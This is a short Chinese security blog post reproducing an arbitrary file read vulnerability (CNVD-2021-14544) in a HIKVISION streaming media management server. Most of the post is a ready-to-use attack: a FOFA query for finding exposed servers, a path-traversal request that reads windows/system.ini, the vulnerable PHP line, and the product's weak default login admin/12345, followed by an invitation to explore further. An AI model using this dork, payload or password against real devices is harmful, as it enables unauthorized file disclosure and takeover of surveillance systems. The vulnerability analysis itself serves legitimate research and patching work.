HIKVISION 流媒体管理服务器后台任意文件读取漏洞(CNVD-2021-14544)复现

admin 2023年6月9日09:05:24HIKVISION 流媒体管理服务器后台任意文件读取漏洞(CNVD-2021-14544)复现已关闭评论41 views字数 438阅读1分27秒阅读模式

1. 影响版本

据不可靠消息:<=V4.3.0


2.使用fofa搜索:

title="流媒体管理服务器"

3.POC

/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini


图片

4.测试发现:

fileName未输入文件名时,返回包会报错,错误信息中包含网站的部分绝对路径信息,经过路径构造可以获取当前php文件的内容:

图片

可以看到,源代码是想把读取的文件写死在log这个目录下,而以下这段代码还是造成了目录穿越!

$file = fopen($file_dir . $file_name,"r"); // 打开文件

剩下的大家自觉发挥吧(切勿非法渗透!)

5.结尾彩蛋:

该产品存在弱口令登录:admin/12345

申明:所有渗透行为都需获取授权!本公众号所分享的内容仅作为技术讨论,禁止用于一切违法行为,违法行为所造成的一切不良后果与文章作者和本公众号无关!未经授权,严禁转载!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月9日09:05:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HIKVISION 流媒体管理服务器后台任意文件读取漏洞(CNVD-2021-14544)复现http://cn-sec.com/archives/1788392.html